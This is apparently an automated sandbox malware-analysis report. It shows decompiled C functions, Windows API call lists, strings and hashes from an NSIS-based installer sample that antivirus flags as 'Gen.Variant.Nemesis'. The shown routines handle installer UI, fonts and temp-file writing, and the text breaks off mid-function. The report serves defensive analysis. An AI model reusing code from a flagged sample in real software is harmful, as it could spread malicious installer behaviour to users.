                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75523420,004035BF,?,00000006,00000008,0000000A), ref: 00406579
                                                                          • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406588
                                                                          • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75523420,004035BF,?,00000006,00000008,0000000A), ref: 0040658D
                                                                          • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75523420,004035BF,?,00000006,00000008,0000000A), ref: 004065A0
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00406517, 0040651C
                                                                          • *?|<>/":, xrefs: 00406568
                                                                          • "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe", xrefs: 00406516
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: Char$Next$Prev
                                                                          • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 589700163-1299859864
                                                                          • Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                                          • Instruction ID: 662237d401549a0b86d5a4e6e01ff77a7750504751085e1aca306c60b5ffe750
                                                                          • Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                                          • Instruction Fuzzy Hash: 3911B655800612A5D7303B18BC40AB776B8EF68750B52403FED8A732C5E77C5CA286BD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E0040427E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                          				struct tagLOGBRUSH _v16;
                                                                          				long _t35;
                                                                          				long _t37;
                                                                          				void* _t40;
                                                                          				long* _t49;
                                                                          
                                                                          				if(_a4 + 0xfffffecd > 5) {
                                                                          					L15:
                                                                          					return 0;
                                                                          				}
                                                                          				_t49 = GetWindowLongW(_a12, 0xffffffeb);
                                                                          				if(_t49 == 0) {
                                                                          					goto L15;
                                                                          				}
                                                                          				_t35 =  *_t49;
                                                                          				if((_t49[5] & 0x00000002) != 0) {
                                                                          					_t35 = GetSysColor(_t35);
                                                                          				}
                                                                          				if((_t49[5] & 0x00000001) != 0) {
                                                                          					SetTextColor(_a8, _t35);
                                                                          				}
                                                                          				SetBkMode(_a8, _t49[4]);
                                                                          				_t37 = _t49[1];
                                                                          				_v16.lbColor = _t37;
                                                                          				if((_t49[5] & 0x00000008) != 0) {
                                                                          					_t37 = GetSysColor(_t37);
                                                                          					_v16.lbColor = _t37;
                                                                          				}
                                                                          				if((_t49[5] & 0x00000004) != 0) {
                                                                          					SetBkColor(_a8, _t37);
                                                                          				}
                                                                          				if((_t49[5] & 0x00000010) != 0) {
                                                                          					_v16.lbStyle = _t49[2];
                                                                          					_t40 = _t49[3];
                                                                          					if(_t40 != 0) {
                                                                          						DeleteObject(_t40);
                                                                          					}
                                                                          					_t49[3] = CreateBrushIndirect( &_v16);
                                                                          				}
                                                                          				return _t49[3];
                                                                          			}









                                                                          APIs
                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 0040429B
                                                                          • GetSysColor.USER32(00000000), ref: 004042B7
                                                                          • SetTextColor.GDI32(?,00000000), ref: 004042C3
                                                                          • SetBkMode.GDI32(?,?), ref: 004042CF
                                                                          • GetSysColor.USER32(?), ref: 004042E2
                                                                          • SetBkColor.GDI32(?,?), ref: 004042F2
                                                                          • DeleteObject.GDI32(?), ref: 0040430C
                                                                          • CreateBrushIndirect.GDI32(?), ref: 00404316
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                          • String ID:
                                                                          • API String ID: 2320649405-0
                                                                          • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                          • Instruction ID: b3876bbcbbff373df079470ccdc5149205509338ab7e68b668f4883140def8c6
                                                                          • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                          • Instruction Fuzzy Hash: B22151B1600704ABCB219F68DE08B5BBBF8AF41714F04897DFD96E26A0D734E944CB64
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00404BB0(struct HWND__* _a4, intOrPtr _a8) {
                                                                          				long _v8;
                                                                          				signed char _v12;
                                                                          				unsigned int _v16;
                                                                          				void* _v20;
                                                                          				intOrPtr _v24;
                                                                          				long _v56;
                                                                          				void* _v60;
                                                                          				long _t15;
                                                                          				unsigned int _t19;
                                                                          				signed int _t25;
                                                                          				struct HWND__* _t28;
                                                                          
                                                                          				_t28 = _a4;
                                                                          				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                                                          				if(_a8 == 0) {
                                                                          					L4:
                                                                          					_v56 = _t15;
                                                                          					_v60 = 4;
                                                                          					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                                                          					return _v24;
                                                                          				}
                                                                          				_t19 = GetMessagePos();
                                                                          				_v16 = _t19 >> 0x10;
                                                                          				_v20 = _t19;
                                                                          				ScreenToClient(_t28,  &_v20);
                                                                          				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                                                          				if((_v12 & 0x00000066) != 0) {
                                                                          					_t15 = _v8;
                                                                          					goto L4;
                                                                          				}
                                                                          				return _t25 | 0xffffffff;
                                                                          			}















                                                                          APIs
                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BCB
                                                                          • GetMessagePos.USER32 ref: 00404BD3
                                                                          • ScreenToClient.USER32(?,?), ref: 00404BED
                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BFF
                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C25
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: Message$Send$ClientScreen
                                                                          • String ID: f
                                                                          • API String ID: 41195575-1993550816
                                                                          • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                          • Instruction ID: fcc096391eddebe8eb85a5aa76d4b30f922b4a39187f2a8acbab72006efdbce5
                                                                          • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                          • Instruction Fuzzy Hash: 31015E71900218BAEB10DB94DD85BFEBBBCAF95B11F10412BBA50B62D0D7B499418BA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 73%
                                                                          			E00401DB3(intOrPtr __edx) {
                                                                          				void* __esi;
                                                                          				int _t9;
                                                                          				signed char _t15;
                                                                          				struct HFONT__* _t18;
                                                                          				intOrPtr _t30;
                                                                          				struct HDC__* _t31;
                                                                          				void* _t33;
                                                                          				void* _t35;
                                                                          
                                                                          				_t30 = __edx;
                                                                          				_t31 = GetDC( *(_t35 - 8));
                                                                          				_t9 = E00402C15(2);
                                                                          				 *((intOrPtr*)(_t35 - 0x4c)) = _t30;
                                                                          				0x40cdd8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
                                                                          				ReleaseDC( *(_t35 - 8), _t31);
                                                                          				 *0x40cde8 = E00402C15(3);
                                                                          				_t15 =  *((intOrPtr*)(_t35 - 0x18));
                                                                          				 *((intOrPtr*)(_t35 - 0x4c)) = _t30;
                                                                          				 *0x40cdef = 1;
                                                                          				 *0x40cdec = _t15 & 0x00000001;
                                                                          				 *0x40cded = _t15 & 0x00000002;
                                                                          				 *0x40cdee = _t15 & 0x00000004;
                                                                          				E004062A4(_t9, _t31, _t33, "Calibri",  *((intOrPtr*)(_t35 - 0x24)));
                                                                          				_t18 = CreateFontIndirectW(0x40cdd8);
                                                                          				_push(_t18);
                                                                          				_push(_t33);
                                                                          				E004061C9();
                                                                          				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
                                                                          				return 0;
                                                                          			}












                                                                          APIs
                                                                          • GetDC.USER32(?), ref: 00401DB6
                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                                                          • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E38
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                          • String ID: Calibri
                                                                          • API String ID: 3808545654-1409258342
                                                                          • Opcode ID: 8f9191b43f1087fd91e2bc6620e9991732759c8a76e5fb6f86f4dddf7fac1548
                                                                          • Instruction ID: 8058adb7fc53f801c03006c9ef56a62efa99793a140a93f16ed6c143b7d909dc
                                                                          • Opcode Fuzzy Hash: 8f9191b43f1087fd91e2bc6620e9991732759c8a76e5fb6f86f4dddf7fac1548
                                                                          • Instruction Fuzzy Hash: 9A015271944240EFE701ABB4AE8A6D97FB49F95301F10457EE241F61E2CAB800459F2D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00402DD7(struct HWND__* _a4, intOrPtr _a8) {
                                                                          				short _v132;
                                                                          				int _t11;
                                                                          				int _t20;
                                                                          
                                                                          				if(_a8 == 0x110) {
                                                                          					SetTimer(_a4, 1, 0xfa, 0);
                                                                          					_a8 = 0x113;
                                                                          				}
                                                                          				if(_a8 == 0x113) {
                                                                          					_t20 =  *0x4169f8; // 0x81503
                                                                          					_t11 =  *0x422a04; // 0x81c18
                                                                          					if(_t20 >= _t11) {
                                                                          						_t20 = _t11;
                                                                          					}
                                                                          					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                                          					SetWindowTextW(_a4,  &_v132);
                                                                          					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                                          				}
                                                                          				return 0;
                                                                          			}







                                                                          APIs
                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
                                                                          • MulDiv.KERNEL32(00081503,00000064,00081C18), ref: 00402E20
                                                                          • wsprintfW.USER32 ref: 00402E30
                                                                          • SetWindowTextW.USER32(?,?), ref: 00402E40
                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52
                                                                          Strings
                                                                          • verifying installer: %d%%, xrefs: 00402E2A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                          • String ID: verifying installer: %d%%
                                                                          • API String ID: 1451636040-82062127
                                                                          • Opcode ID: f82802282f146ff8d7a81516d08dd23d853d0675b9ceba9b20e767ba0194de88
                                                                          • Instruction ID: 0244175548504e0de7267acb57bf05e9e9b1595e8d7e84e5cb6d98a661a40fbb
                                                                          • Opcode Fuzzy Hash: f82802282f146ff8d7a81516d08dd23d853d0675b9ceba9b20e767ba0194de88
                                                                          • Instruction Fuzzy Hash: B6014470640208BBDF209F50DE49FAA3B69BB00304F008039FA46A51D0DBB889558B59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 76%
                                                                          			E100024A4(intOrPtr* _a4) {
                                                                          				intOrPtr _v4;
                                                                          				intOrPtr* _t24;
                                                                          				void* _t26;
                                                                          				intOrPtr _t27;
                                                                          				signed int _t35;
                                                                          				void* _t39;
                                                                          				intOrPtr _t40;
                                                                          				void* _t43;
                                                                          
                                                                          				_t39 = E1000121B();
                                                                          				_t24 = _a4;
                                                                          				_t40 =  *((intOrPtr*)(_t24 + 0x1014));
                                                                          				_v4 = _t40;
                                                                          				_t43 = (_t40 + 0x81 << 5) + _t24;
                                                                          				do {
                                                                          					if( *((intOrPtr*)(_t43 - 4)) != 0xffffffff) {
                                                                          					}
                                                                          					_t35 =  *(_t43 - 8);
                                                                          					if(_t35 <= 7) {
                                                                          						switch( *((intOrPtr*)(_t35 * 4 +  &M100025B4))) {
                                                                          							case 0:
                                                                          								 *_t39 =  *_t39 & 0x00000000;
                                                                          								goto L15;
                                                                          							case 1:
                                                                          								_push( *__eax);
                                                                          								goto L13;
                                                                          							case 2:
                                                                          								__eax = E10001470(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                                                          								goto L14;
                                                                          							case 3:
                                                                          								__ecx =  *0x1000406c;
                                                                          								__edx = __ecx - 1;
                                                                          								__eax = MultiByteToWideChar(0, 0,  *__eax, __ecx, __edi, __edx);
                                                                          								__eax =  *0x1000406c;
                                                                          								 *(__edi + __eax * 2 - 2) =  *(__edi + __eax * 2 - 2) & 0x00000000;
                                                                          								goto L15;
                                                                          							case 4:
                                                                          								__eax = lstrcpynW(__edi,  *__eax,  *0x1000406c);
                                                                          								goto L15;
                                                                          							case 5:
                                                                          								_push( *0x1000406c);
                                                                          								_push(__edi);
                                                                          								_push( *__eax);
                                                                          								__imp__StringFromGUID2();
                                                                          								goto L15;
                                                                          							case 6:
                                                                          								_push( *__esi);
                                                                          								L13:
                                                                          								__eax = wsprintfW(__edi, __ebp);
                                                                          								L14:
                                                                          								__esp = __esp + 0xc;
                                                                          								goto L15;
                                                                          						}
                                                                          					}
                                                                          					L15:
                                                                          					_t26 =  *(_t43 + 0x14);
                                                                          					if(_t26 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
                                                                          						GlobalFree(_t26);
                                                                          					}
                                                                          					_t27 =  *((intOrPtr*)(_t43 + 0xc));
                                                                          					if(_t27 != 0) {
                                                                          						if(_t27 != 0xffffffff) {
                                                                          							if(_t27 > 0) {
                                                                          								E100012E1(_t27 - 1, _t39);
                                                                          								goto L24;
                                                                          							}
                                                                          						} else {
                                                                          							E10001272(_t39);
                                                                          							L24:
                                                                          						}
                                                                          					}
                                                                          					_v4 = _v4 - 1;
                                                                          					_t43 = _t43 - 0x20;
                                                                          				} while (_v4 >= 0);
                                                                          				return GlobalFree(_t39);
                                                                          			}












                                                                          APIs
                                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                          • GlobalFree.KERNEL32(?), ref: 1000256D
                                                                          • GlobalFree.KERNEL32(00000000), ref: 100025A8
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29266932000.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000001.00000002.29266891366.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 00000001.00000002.29266969679.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 00000001.00000002.29267005182.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_10000000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: Global$Free$Alloc
                                                                          • String ID:
                                                                          • API String ID: 1780285237-0
                                                                          • Opcode ID: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                                          • Instruction ID: 149f0ffe7112dafd64944f245e56057b96fa329c468151baa91e3d773918aa42
                                                                          • Opcode Fuzzy Hash: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                                          • Instruction Fuzzy Hash: 1031AF71504651EFF721CF14CCA8E2B7BB8FB853D2F114119F940961A8C7719851DB69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 86%
                                                                          			E004028A7(int __ebx) {
                                                                          				void* _t26;
                                                                          				long _t31;
                                                                          				int _t45;
                                                                          				void* _t49;
                                                                          				void* _t51;
                                                                          				void* _t54;
                                                                          				void* _t55;
                                                                          				void* _t56;
                                                                          
                                                                          				_t45 = __ebx;
                                                                          				 *((intOrPtr*)(_t56 - 0x30)) = 0xfffffd66;
                                                                          				_t50 = E00402C37(0xfffffff0);
                                                                          				 *(_t56 - 0x38) = _t23;
                                                                          				if(E00405BCA(_t50) == 0) {
                                                                          					E00402C37(0xffffffed);
                                                                          				}
                                                                          				E00405D4F(_t50);
                                                                          				_t26 = E00405D74(_t50, 0x40000000, 2);
                                                                          				 *(_t56 + 8) = _t26;
                                                                          				if(_t26 != 0xffffffff) {
                                                                          					_t31 =  *0x434ef8;
                                                                          					 *(_t56 - 0x3c) = _t31;
                                                                          					_t49 = GlobalAlloc(0x40, _t31);
                                                                          					if(_t49 != _t45) {
                                                                          						E0040332B(_t45);
                                                                          						E00403315(_t49,  *(_t56 - 0x3c));
                                                                          						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
                                                                          						 *(_t56 - 0x4c) = _t54;
                                                                          						if(_t54 != _t45) {
                                                                          							E004030FA( *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
                                                                          							while( *_t54 != _t45) {
                                                                          								_t47 =  *_t54;
                                                                          								_t55 = _t54 + 8;
                                                                          								 *(_t56 - 0x34) =  *_t54;
                                                                          								E00405D2F( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
                                                                          								_t54 = _t55 +  *(_t56 - 0x34);
                                                                          							}
                                                                          							GlobalFree( *(_t56 - 0x4c));
                                                                          						}
                                                                          						E00405E26( *(_t56 + 8), _t49,  *(_t56 - 0x3c));
                                                                          						GlobalFree(_t49);
                                                                          						 *((intOrPtr*)(_t56 - 0x30)) = E004030FA(0xffffffff,  *(_t56 + 8), _t45, _t45);
                                                                          					}
                                                                          					CloseHandle( *(_t56 + 8));
                                                                          				}
                                                                          				_t51 = 0xfffffff3;
                                                                          				if( *((intOrPtr*)(_t56 - 0x30)) < _t45) {
                                                                          					_t51 = 0xffffffef;
                                                                          					DeleteFileW( *(_t56 - 0x38));
                                                                          					 *((intOrPtr*)(_t56 - 4)) = 1;
                                                                          				}
                                                                          				_push(_t51);
                                                                          				E00401423();
                                                                          				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t56 - 4));
                                                                          				return 0;
                                                                          			}












                                                                          APIs
                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
                                                                          • GlobalFree.KERNEL32(?), ref: 00402950
                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402963
                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
                                                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                          • String ID:
                                                                          • API String ID: 2667972263-0
                                                                          • Opcode ID: f62c8856deeff081086e792091e27b9e6cd03f1654503537dfa884b98f73c81c
                                                                          • Instruction ID: c7dec26b55dd312fec5fb3faf1598927ec34475db9096b9e5e75d52a628400f5
                                                                          • Opcode Fuzzy Hash: f62c8856deeff081086e792091e27b9e6cd03f1654503537dfa884b98f73c81c
                                                                          • Instruction Fuzzy Hash: E521BDB1C00128BBDF216FA5DE49D9E7E79EF08364F10423AF964762E0CB794C418B98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 88%
                                                                          			E00402592(int __ebx, void* __edx, intOrPtr* __esi) {
                                                                          				signed int _t14;
                                                                          				int _t17;
                                                                          				int _t24;
                                                                          				signed int _t29;
                                                                          				intOrPtr* _t32;
                                                                          				void* _t34;
                                                                          				void* _t35;
                                                                          				void* _t38;
                                                                          				signed int _t40;
                                                                          
                                                                          				_t32 = __esi;
                                                                          				_t24 = __ebx;
                                                                          				_t14 =  *(_t35 - 0x20);
                                                                          				_t38 = __edx - 0x38;
                                                                          				 *(_t35 - 0x4c) = _t14;
                                                                          				_t27 = 0 | _t38 == 0x00000000;
                                                                          				_t29 = _t38 == 0;
                                                                          				if(_t14 == __ebx) {
                                                                          					if(__edx != 0x38) {
                                                                          						_t17 = lstrlenW(E00402C37(0x11)) + _t16;
                                                                          					} else {
                                                                          						E00402C37(0x21);
                                                                          						WideCharToMultiByte(__ebx, __ebx, "C:\Users\Arthur\AppData\Local\Temp\nsbA35F.tmp", 0xffffffff, "C:\Users\Arthur\AppData\Local\Temp\nsbA35F.tmp\System.dll", 0x400, __ebx, __ebx);
                                                                          						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nsbA35F.tmp\System.dll");
                                                                          					}
                                                                          				} else {
                                                                          					E00402C15(1);
                                                                          					 *0x40add0 = __ax;
                                                                          					 *((intOrPtr*)(__ebp - 0x3c)) = __edx;
                                                                          				}
                                                                          				 *(_t35 + 8) = _t17;
                                                                          				if( *_t32 == _t24) {
                                                                          					L13:
                                                                          					 *((intOrPtr*)(_t35 - 4)) = 1;
                                                                          				} else {
                                                                          					_t34 = E004061E2(_t27, _t32);
                                                                          					if((_t29 |  *(_t35 - 0x4c)) != 0 ||  *((intOrPtr*)(_t35 - 0x1c)) == _t24 || E00405E55(_t34, _t34) >= 0) {
                                                                          						_t14 = E00405E26(_t34, "C:\Users\Arthur\AppData\Local\Temp\nsbA35F.tmp\System.dll",  *(_t35 + 8));
                                                                          						_t40 = _t14;
                                                                          						if(_t40 == 0) {
                                                                          							goto L13;
                                                                          						}
                                                                          					} else {
                                                                          						goto L13;
                                                                          					}
                                                                          				}
                                                                          				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
                                                                          				return 0;
                                                                          			}













                                                                          APIs
                                                                          • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsbA35F.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,00000400,?,?,00000021), ref: 004025E2
                                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsbA35F.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,00000400,?,?,00000021), ref: 004025ED
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWidelstrlen
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp$C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll
                                                                          • API String ID: 3109718747-3235477043
                                                                          • Opcode ID: 29697b63a1bf179c8a70b2ea45890600dc215057ee6868cc9ec1e4f57a159bbe
                                                                          • Instruction ID: 59cf546ef3811be8ee7c727c8e5eea11e2141b44b9e391d5d171073bbb1e77e0
                                                                          • Opcode Fuzzy Hash: 29697b63a1bf179c8a70b2ea45890600dc215057ee6868cc9ec1e4f57a159bbe
                                                                          • Instruction Fuzzy Hash: F611EB72A01204BEDB146FB18E8EA9F77659F45398F20453BF102F61C1DAFC89415B5E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 85%
                                                                          			E100022D0(void* __edx) {
                                                                          				void* _t37;
                                                                          				signed int _t38;
                                                                          				void* _t39;
                                                                          				void* _t41;
                                                                          				signed int* _t42;
                                                                          				signed int* _t51;
                                                                          				void* _t52;
                                                                          				void* _t54;
                                                                          
                                                                          				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
                                                                          				while(1) {
                                                                          					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
                                                                          					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
                                                                          					_t52 = _t51[6];
                                                                          					if(_t52 == 0) {
                                                                          						goto L9;
                                                                          					}
                                                                          					_t41 = 0x1a;
                                                                          					if(_t52 == _t41) {
                                                                          						goto L9;
                                                                          					}
                                                                          					if(_t52 != 0xffffffff) {
                                                                          						if(_t52 <= 0 || _t52 > 0x19) {
                                                                          							_t51[6] = _t41;
                                                                          							goto L12;
                                                                          						} else {
                                                                          							_t37 = E100012BA(_t52 - 1);
                                                                          							L10:
                                                                          							goto L11;
                                                                          						}
                                                                          					} else {
                                                                          						_t37 = E10001243();
                                                                          						L11:
                                                                          						_t52 = _t37;
                                                                          						L12:
                                                                          						_t13 =  &(_t51[2]); // 0x1020
                                                                          						_t42 = _t13;
                                                                          						if(_t51[1] != 0xffffffff) {
                                                                          						}
                                                                          						_t38 =  *_t51;
                                                                          						_t51[7] = 0;
                                                                          						if(_t38 > 7) {
                                                                          							L27:
                                                                          							_t39 = GlobalFree(_t52);
                                                                          							if( *(_t54 + 0x10) == 0) {
                                                                          								return _t39;
                                                                          							}
                                                                          							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
                                                                          								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
                                                                          							} else {
                                                                          								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
                                                                          							}
                                                                          							continue;
                                                                          						} else {
                                                                          							switch( *((intOrPtr*)(_t38 * 4 +  &M10002447))) {
                                                                          								case 0:
                                                                          									 *_t42 = 0;
                                                                          									goto L27;
                                                                          								case 1:
                                                                          									__eax = E10001311(__ebp);
                                                                          									goto L21;
                                                                          								case 2:
                                                                          									 *__edi = E10001311(__ebp);
                                                                          									__edi[1] = __edx;
                                                                          									goto L27;
                                                                          								case 3:
                                                                          									__eax = GlobalAlloc(0x40,  *0x1000406c);
                                                                          									 *(__esi + 0x1c) = __eax;
                                                                          									__edx = 0;
                                                                          									 *__edi = __eax;
                                                                          									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x1000406c, __eax,  *0x1000406c, 0, 0);
                                                                          									goto L27;
                                                                          								case 4:
                                                                          									__eax = E1000122C(__ebp);
